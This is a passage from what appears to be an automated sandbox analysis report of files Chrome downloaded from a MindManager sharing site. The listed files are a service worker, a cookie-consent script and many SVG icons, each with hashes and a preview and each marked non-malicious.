                                                                SHA-512:2A21315CA2608B87BA79246478AF80A315EBD7645225CCEF9E8A9E4E33178C68332B987BD6AFA3A1BFD1F8E2DE10939D5B9FFA910C3F003FE81A41D537CE5C44
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/sw.js
                                                                Preview:(function () {. 'use strict';.. // @ts-ignore. try {. self['workbox:core:6.4.1'] && _();. }. catch (e) { }.. /*. Copyright 2019 Google LLC. Use of this source code is governed by an MIT-style. license that can be found in the LICENSE file or at. https://opensource.org/licenses/MIT.. */. const logger = ((() => {. // Don't overwrite this value if it's already set.. // See https://github.com/GoogleChrome/workbox/pull/2284#issuecomment-560470923. if (!('__WB_DISABLE_DEV_LOGS' in self)) {. self.__WB_DISABLE_DEV_LOGS = false;. }. let inGroup = false;. const methodToColorMap = {. debug: `#7f8c8d`,. log: `#2ecc71`,. warn: `#f39c12`,. error: `#c0392b`,. groupCollapsed: `#3498db`,. groupEnd: null, // No colored prefix on groupEnd. };. const print = functio
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (21229)
                                                                Category:downloaded
                                                                Size (bytes):21230
                                                                Entropy (8bit):5.307614848024259
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:26DFF7B84954EF35ED7B3C7E01C4C08B
                                                                SHA1:6A03338997D33C4EBF80D3D6C30A467CB9AA5488
                                                                SHA-256:022E2F39DEBA7F332EABE69B27B31D98D4D5F2535116745957A691D1B1EC4CC5
                                                                SHA-512:EE5C7768B702099D46BC3620319E378A528FB5724DE0A9DF8166AE92364956B3E45BA717A8257A937B058664E60DFF4168F72F184623F95902CCD264A63C57CA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
                                                                Preview:var OneTrustStub=function(t){"use strict";var a,o,p=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.vendorsServiceData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(m=g=g||{})[m.Days=1]="Days",m[m.Weeks=7]="Weeks",m[m.Months=30]="Months",m[m.Years=365]="Years",(m=i=i||{}).Name="OTGPPConsent",m[m.ChunkSize=4e3]="ChunkSize
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):354
                                                                Entropy (8bit):5.279181795924615
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:667DC0CD3B4A357FD309313C489D1AEF
                                                                SHA1:781F73CAC0758D4EA5B970D0115AD65398B18EC4
                                                                SHA-256:1C2C5BB620F71D17A304215F3E26C012AAC3FF2AAB5413313D73E8D062E1AD81
                                                                SHA-512:F1EB6A717ED7F33BCD85A0B959E4F9F63CCAF7C51B626A90B74BE806F87C0E39BDA491778C23EFFFB0AE249B79E42A3B5EFC7BEDEE12DA6DE52D1F2A596B5D11
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/unknown.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#666;}</style></defs><title>heart_grey_16 copy 3</title><polygon class="cls-1" points="0.5 15.5 0.5 0.5 7.79 0.5 15.29 8 7.79 15.5 0.5 15.5"/><path class="cls-2" d="M7.59,1l7,7-7,7H1V1H7.59M8,0H0V16H8l8-8L8,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):423
                                                                Entropy (8bit):4.993616312811675
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0630038AD1FD9A12C865341D209AA9CB
                                                                SHA1:241092FFFE6C2EEF6C53F57E0C9CD633717762F0
                                                                SHA-256:D6E08C206FD7EADD65548A05FEE20F336AB17DFEF678FFA8FB3869433BC76088
                                                                SHA-512:A0E31CE9581405BA2BF4B699B6450EC91A44BCD9A40D5EA9C105D953D85F6A9456807FAAF50115C050B3D8B60D21E0D1D840759F3FE5A7F95659CFF3DB271614
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/flag-black.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{opacity:0.2;}</style></defs><title>flag-black_16 copy</title><rect x="1" width="1" height="16" rx="0.5" ry="0.5"/><rect width="1" height="16" rx="0.5" ry="0.5"/><polygon points="8 11 8 4.5 16 7.75 8 11"/><polygon points="8 8.5 2 10 2 1 8 2.5 8 8.5"/><rect class="cls-1" x="7" y="3" width="1" height="6"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):845
                                                                Entropy (8bit):4.803379553423028
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6081E570A2A9BEFFF66366EDCD850B0C
                                                                SHA1:161062CE7E90DA1F58434A4ABF76A2F04072C8A7
                                                                SHA-256:92F34E173539AEC15B66C07870B85101B8031B06240422FAA310AEABD4317625
                                                                SHA-512:50D11FBAEC31A14BCC7CCE2D07E126EA65C58349757A7C0DF5F5B5097893F89CBD42296358B130444439A80FFDA7412EDD9DABAC53F23C68C388FFB5176631FC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/close.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px".. viewBox="0 0 18 17.3" enable-background="new 0 0 18 17.3" xml:space="preserve">..<path fill="#333333" d="M9.5,8.5l5.1,5.1c0.1,0.1,0.1,0.2,0.1,0.3s0,0.2-0.1,0.3c0,0-0.1,0.1-0.2,0.1c-0.1,0-0.1,0-0.2,0...c-0.1,0-0.1,0-0.2,0c-0.1,0-0.1-0.1-0.2-0.1L8.9,9.2l-5.1,5.1c0,0-0.1,0.1-0.2,0.1c-0.1,0-0.1,0-0.2,0c-0.1,0-0.1,0-0.2,0...c-0.1,0-0.1-0.1-0.2-0.1c-0.1-0.1-0.1-0.2-0.1-0.3s0-0.2,0.1-0.3l5.1-5.1L3.2,3.4C3.1,3.3,3.1,3.2,3.1,3.1s0-0.2,0.1-0.3...s0.2-0.1,0.3-0.1c0.1,0,0.2,0,0.3,0.1l5.1,5.1L14,2.8c0.1-0.1,0.2-0.1,0.3-0.1s0.2,0,0.3,0.1s0.1,0.2,0.1,0.3s0,0.2-0.1,0.3...L9.5,8.5z"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):781
                                                                Entropy (8bit):5.414010223737348
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C62D9CF3698F8CA9D4ADB4F3EF5F884F
                                                                SHA1:2F68CD3534D3762F0D9F6BC8A136D14BB14596C8
                                                                SHA-256:806D15C46F6A482E3A7E2543936DD379B46413B33B34A87B1119014059724CCA
                                                                SHA-512:427C8EC16F11F23E0A85D5C3E22B4271F17EE5EB267D66D5E0437413C3AA27FDAA7384D92BC3F3DEC339A8D12696F87D1C042EC44C17F8C2F5E4CBDB23569ADF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_layout_top.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="11.8px" height="15.7px" viewBox="0 0 11.8 15.7" enable-background="new 0 0 11.8 15.7" xml:space="preserve">..<g>...<path fill="#5c707c" d="M7.8,15.7H4c-2.2,0-4-1.8-4-4v-0.5c0-2.2,1.8-4,4-4h3.8c2.2,0,4,1.8,4,4v0.5C11.8,13.9,10.1,15.7,7.8,15.7z.... M4,9.2c-1.1,0-2,0.9-2,2v0.5c0,1.1,0.9,2,2,2h3.8c1.1,0,2-0.9,2-2v-0.5c0-1.1-0.9-2-2-2H4z"/>...<g>....<rect x="4.9" y="4.2" fill="#5c707c" width="2" height="5"/>....<g>.....<polygon fill="#5c707c" points="9.3,5.2 6.3,0 3.4,5.2 ..."/>....</g>...</g>..</g>..</svg>..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):496
                                                                Entropy (8bit):5.045399047148501
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5BFE53A3525E138663009A9E10E16FBF
                                                                SHA1:855D00751C5867257446BB7D835152E4351E9811
                                                                SHA-256:6599D49FF3601E33F37F5C6B01EEC288E442C08D03B062DEE60923C03156F7DC
                                                                SHA-512:D26E21451EC730DBCCF010E62FBA7A41F60728DF88416CA32CB40F4119D7FB4077E9ED67A63ADA1F5AA6396005B71C93F5E42E74D0E737D56DE10D3883385F81
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/2circlevenndiagram.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="62.36" cy="45.36" r="39.36" fill="#FEEABA"/>.<circle cx="106.639" cy="45.36" r="39.36" fill="#EFD0CF"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M84.5026 77.9053C74.107 70.8207 67.2812 58.8859 67.2812 45.357C67.2812 31.8292 74.1058 19.8953 84.4998 12.8105C94.8955 19.8951 101.721 31.8299 101.721 45.3589C101.721 58.8866 94.8967 70.8205 84.5026 77.9053Z" fill="#EEBF98"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):243
                                                                Entropy (8bit):5.016913234211092
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2FA06E0EE64C50FB335344E8CA103EE9
                                                                SHA1:AF9DAA4C4BD2C534BF18FD81E4A74E868753B590
                                                                SHA-256:19C2A6E18CB5521FDB8E4FC91A3F9A93F92467B08A4E611C628787011B9801BF
                                                                SHA-512:31B6EE831D2048E44266A1D566E1F2D090975109744B6CFCA69AE171A33E402C9F24799529D9736B5BFBB3E3061493B1338D776A2E5F5C4C5BE37692DCA96F4C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/marker-5.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f8804a;}</style></defs><title>heart_orange_16 copy</title><polygon class="cls-1" points="0 0 8 0 16 8 8 16 0 16 0 0"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):764
                                                                Entropy (8bit):5.17211579071904
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:29ABE7CC94E951E853C50D5970BEBF49
                                                                SHA1:B8CC4DE5065B6D0DD655374366ABB12039AD05FB
                                                                SHA-256:277F2D320AB3EA2054114DEFE26F6D8CD94E7162F318D6B2F01714F3347B5E0D
                                                                SHA-512:BA69E5A99881D03372C05BEDE04543FB045B61C4F8600418055B108B0F60750292470DB23CD7C911E68A69CB0463F5B4AE8DD795AD7509310583CC3838BAE018
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/roPercentageDone05.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}.cls-5{fill:gray;}</style></defs><title>roPercentageDone05</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8.5.52a7.5,7.5,0,0,1,0,15Z"/><path class="cls-4" d="M9,1.07A7,7,0,0,1,9,14.93V1.07M8,0V16A8,8,0,0,0,8,0Z"/><path class="cls-5" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-1" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):569
                                                                Entropy (8bit):5.056149692743339
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EFB3585A18A7E809B28AAEA5409864C7
                                                                SHA1:140BDBC1248857314866456FC28BE777C1AC532A
                                                                SHA-256:DB3F7D0AF931A8B02AE0780596F529E045AE9CCCEB05B612F1178EA80C6F41C8
                                                                SHA-512:BF966E607A94CEDC0691F23B5F93B52D0A5207944A3170870B5C06A1581DEAEB31D5C8AEEFF18489E9BB97CC51FC33E3372FD8DB0DA7C1E3045AF086B4E77E7A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_close.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 14.87 14.87"><defs><style>.cls-1{fill:#c75552;stroke:#a32122;stroke-miterlimit:10;stroke-width:0.87px;}</style></defs><title>context_close</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M9,7.44l5.11-5.12a1.09,1.09,0,0,0,0-1.56,1.1,1.1,0,0,0-1.56,0L7.44,5.87,2.32.76A1.1,1.1,0,0,0,.76,2.32L5.87,7.44.76,12.55a1.11,1.11,0,0,0,.78,1.89,1.07,1.07,0,0,0,.78-.33L7.44,9l5.11,5.11a1.1,1.1,0,0,0,.78.33,1.07,1.07,0,0,0,.78-.33,1.09,1.09,0,0,0,0-1.56Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):655
                                                                Entropy (8bit):5.25669707299743
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BE8BF80867AAB7660165ADD0AC7AC1B3
                                                                SHA1:D9B925BDB65A16703066DB0662ADA1125113E325
                                                                SHA-256:5931763428A0EC61E53E191209CB71DFB08B99FD5D187C55CA99F4F4AB9CB2E0
                                                                SHA-512:1ED6799EE594B12C850487239CDC2819157AB7DF4EE1193C3C610873087DB307B79307A530B9871392CE9FB73256A7069431D9F33405481311A395CECEE067FA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_export.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 14 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:#629f59;}</style></defs><title>context_export</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M9,9h2V3.8L7.55,0H1.35S0,1.23,0,1.94V14.38A2,2,0,0,0,1.35,16H5V11H9Z"/><polygon class="cls-2" points="8 0.6 8 5 12 5 8 0.6"/><polygon class="cls-3" points="14 13 10 10 10 12 6 12 6 14 10 14 10 16 14 13"/><path class="cls-2" d="M8.46,0H1.85A1.82,1.82,0,0,0,0,1.78V14.22A1.82,1.82,0,0,0,1.85,16H9V15H1.85A.83.83,0,0,1,1,14.22V1.78A.83.83,0,0,1,1.85,1H8l3,3.28V9h1V3.89Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):809
                                                                Entropy (8bit):5.040045814677022
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8AB053367D900C143AE2D7D5111A6C05
                                                                SHA1:E4F9E7CFCB21616B5ACE7885BD848EAB9AFE5E01
                                                                SHA-256:8ED0177AA7AA950607576B3D74EE1567D18C89224BD44161676BAA588A2152C0
                                                                SHA-512:82B7080E05FAC9C4391D07A29D2ABB27F32452C29A76D107852A45341E13498C0CA0E35A7BA94F3690302A3B1079E0346DEAA780501CBC7E2D1969C639751D17
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/coffee-cup.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbcd58;}.cls-2{fill:#534741;}.cls-3{fill:#a67c52;}</style></defs><title>coffee_2_16</title><path class="cls-1" d="M1.5,3h9A1.5,1.5,0,0,1,12,4.5v5.75A5.75,5.75,0,0,1,6.25,16h-.5A5.75,5.75,0,0,1,0,10.25V4.5A1.5,1.5,0,0,1,1.5,3Z"/><path class="cls-1" d="M12.5,5h0A3.5,3.5,0,0,0,9,8.5H9A3.5,3.5,0,0,0,12.5,12h0A3.5,3.5,0,0,0,16,8.5h0A3.5,3.5,0,0,0,12.5,5ZM14,9c.5,1.1-.4,2-1.5,2H12a2,2,0,0,1-2-2V8.5c0-1.1.9-3,2-2.5h.5c1.1-.5,2,1.4,1.5,2.5Z"/><ellipse class="cls-2" cx="6" cy="5.5" rx="5" ry="1.5"/><rect class="cls-2" x="5" width="1" height="2" rx="0.5" ry="0.5"/><rect class="cls-2" x="7" width="1" height="2" rx="0.5" ry="0.5"/><ellipse class="cls-3" cx="6.5" cy="11" rx="1.5" ry="2"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):36018
                                                                Entropy (8bit):4.210463605520769
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7B9A0B3F428B3F6313D53E0DE1DCF648
                                                                SHA1:968315B3E02C7F3AE70036019F7DD2B7C7A0F81B
                                                                SHA-256:E5595BFE4AFEB8FE46360088C005298FB4DB2CD99BC2B1390EAC0997AB18D8C9
                                                                SHA-512:AEDB071F471296FAC39C1312ECDFD8A4BDD2EFA8156A225ABA1138410F8F25D7D3AEECCED83EFF456D2F8294528BAAB457C398C076FBB7264C70B42992D68921
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_dashboards.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_7850)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#CADEF7"/>..<path d="M536.927 15.158C550.196 14.8454 563.575 11.2547 576.62 14.1529C600.458 19.4487 618.567 48.9378 615.538 77.5275C612.508 106.117 588.813 129.353 564.614 127.462C556.798 126.851 548.778 124.007 541.301 126.782C531.337 130.481 525.222 143.15 515.318 147.073C501.905 152.385 484.853 139.05 474.529 129.926C463.879 120.515 451.527 106.471 446.602 91.4195C441.522 75.8908 442.432 55.3172 446.237 39.5552C449.647 25.4276 458.223 13.5218 469.663 7.79381C483.606 0.811412 494.988 6.04103 508.577 10.7045C517.785 13.8708 527.342 15.3721 536.927 15.158Z" fill="#A7C9F3"/>..<path d="M593.979 12.4961H487.929C483.247 12.4961 479.451 16.2918 479.451 2
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):420
                                                                Entropy (8bit):5.264314988640701
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7FAB033C15AF07D0BDF60D2B6AF96D54
                                                                SHA1:5A0B6B9209EFFE7D2F739404CB21CD6CEAD3B801
                                                                SHA-256:0C460063DB13F4E33BE009AC69906A1A97BAC80770F6E8560388486B4ABFE688
                                                                SHA-512:FA4605F630BB0BB87093A4354DA4BC2988EE7B0009795E1E2992A1D29D195E9D8EE007EE094E546A1B9206EA9222E4A1FE81F6470B689F60A8DB1C5E69CF5778
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/upgrade_icon.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 15"><defs><style>.cls-1{fill:#98bf7e;}.cls-2{fill:#63a557;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="4.5 14.5 4.5 7.5 1.26 7.5 8.48 0.71 14.85 7.5 11.5 7.5 11.5 14.5 4.5 14.5"/><path class="cls-2" d="M8.46,1.41,13.69,7H11v7H5V7H2.52L8.46,1.41M8.5,0,0,8H4v7h8V8h4L8.5,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):387
                                                                Entropy (8bit):5.28192796802372
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:28D47BD75100765D0DF7C1BED549849C
                                                                SHA1:C63419E11C8E5D38BC584842488DAB72A4475E49
                                                                SHA-256:89B561369589D12E231710500DEBBF0C0A0BC66D336E4BE60BD7BB86416F0C61
                                                                SHA-512:25F909547DAE11DEAF05C8D94075AA6F1B4A53DB4B67853D92614626A59F533123BA46FD3A3F25050BB0870A4EA819134037DC236880F3A83148D4113C0CBF78
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/right-angle-triangle.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><title>background_shape_Asset 69</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="0.5 15.5 0.5 1.21 14.79 15.5 0.5 15.5"/><path class="cls-2" d="M1,2.41,13.59,15H1V2.41M0,0V16H16L0,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):177
                                                                Entropy (8bit):4.948112486048847
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B237D15BE5FDC0A1F4841BDEF1126ACC
                                                                SHA1:3F2212A11DD8BA5668E51C33215807C41D46AA20
                                                                SHA-256:697474E2EB0BA8B2A27188DD44412B42FCDB03F899C8EDA74093BE86E53413D1
                                                                SHA-512:0F4FC6F4DE20DBEF56BDF4D5BB7807A3902EE4A482C3490D0D4DDFEF789BE04726AED5AD5937D3613F2894DB73D7A3ABDB547E4D42E816E882F1EE326175E095
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_checked.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 30 30" stroke="#3A52A4" fill="transparent" stroke-width="3"><path fill="#3A52A4" d="M0 15 L10 25 L30 5 L10 25"></path></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):163594
                                                                Entropy (8bit):4.184089435667794
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:607889D76A829954452E729248949207
                                                                SHA1:F0F24A9092F8CC58B15B7468E0698E74FC524E46
                                                                SHA-256:77E13084465C5CC1C835B2E196A32BA33E0DB0BCB994763BF45202534D150D21
                                                                SHA-512:92A6E071A49C3893F92C24A4F6E1921AAD15A4AFC34CA4CEDEA2D210AA57594A2357A3FC7779F3C5836121CFABCF5CF5581CA16A362CACC9BEB577248F73F268
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_research_design.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_2883)">..<rect width="200" height="250" rx="10" fill="#FFF3DC"/>..<path d="M22.3778 88.3269C10.268 107.49 8.47959 132.819 15.5221 154.617C22.5646 176.416 37.7713 194.704 56.0924 207.262C79.9882 223.642 110.611 230.647 137.709 221.336C164.806 212.024 186.652 184.603 186.398 154.574C186.275 140.142 180.326 124.766 168.153 118.141C156.422 111.756 141.667 114.675 129.836 108.495C108.64 97.4213 104.752 64.5751 79.3924 58.9264C59.2695 54.445 33.0329 71.4656 22.3778 88.3269Z" fill="#FBE5BC"/>..<path d="M34.7416 64.1992H167.858C173.736 64.1992 178.5 69.9399 178.5 77.0214V191.577C178.5 198.659 173.736 204.399 167.858 204.399H34.7416C28.8644 204.399 24.1 198.659 24.1 191.577V77.0214C24.1 69.9399 28.8644 64.1992 34.7416 64.1992Z" fill="white"/>..<path d="M24.1001 71.1992C24.1001 67.3332 27.2341 64.1992 31.1001 64.1992H171.5C175.366 64.1992 178.5 67.3332 178.5 71.1992V7
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1149
                                                                Entropy (8bit):4.5028250519951465
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B18B97D4C3A1DDA6F4CD65196ED8C2ED
                                                                SHA1:788B39EB41DD45532A95EED24A4ACC825CD0BAFD
                                                                SHA-256:88AC07798BD7C1D922E9860DC596B9C54237B602EB71E3C8F9D90DCA021B9374
                                                                SHA-512:215239F9CA9E1E41E9002D398A13CFF6AE78637B807BD093503634E87DD216E483BF0BEF624082AE73314EB71E857CAB9028853019ED66D128DD0EA0B530FB81
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-presentation/svg/restart.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 14 12.05"><defs><style>.cls-1{fill:#3a52a4;stroke:#3a52a4;stroke-miterlimit:10;}</style></defs><title>2018 Publish - restart</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M11.88,2.12a5.58,5.58,0,0,1,.7.84,5.45,5.45,0,0,1,.82,2,5.71,5.71,0,0,1,0,2.17,5.38,5.38,0,0,1-.31,1,5.58,5.58,0,0,1-3,3,5.38,5.38,0,0,1-1,.31,5.65,5.65,0,0,1-1.08.1.32.32,0,0,1-.24-.1.31.31,0,0,1-.09-.23A.32.32,0,0,1,7.74,11,.33.33,0,0,1,8,10.9a4.72,4.72,0,0,0,1.89-.38,4.92,4.92,0,0,0,2.6-2.6,4.87,4.87,0,0,0,0-3.79,4.89,4.89,0,0,0-2.6-2.6,4.9,4.9,0,0,0-3.79,0,4.87,4.87,0,0,0-2.6,2.6A4.76,4.76,0,0,0,3.1,6v.84l1.39-1.4a.32.32,0,0,1,.23-.09.32.32,0,0,1,.33.33A.32.32,0,0,1,5,5.93L3,7.88,2.9,8,2.77,8,2.66,8l-.11-.07L.6,5.93A.32.32,0,0,1,.5,5.7a.31.31,0,0,1,.1-.23.31.31,0,0,1,.23-.09.31.31,0,0,1,.23.09l1.4,1.4V6a5.43,5.43,0,0,1,.11-1.09,5.84,5.84,0,0,1,.31-1A5.29,5.29,0,0,1,3.37,3,5.66,5.66,0,0,1,4.91,1.42a5.29,5.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (2658), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):2666
                                                                Entropy (8bit):5.47817915671394
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7FF974CEDDD2170DAA5BEBC3AE0A23CD
                                                                SHA1:AEB37C04A88652122F0BE90190E1832E06A44C0C
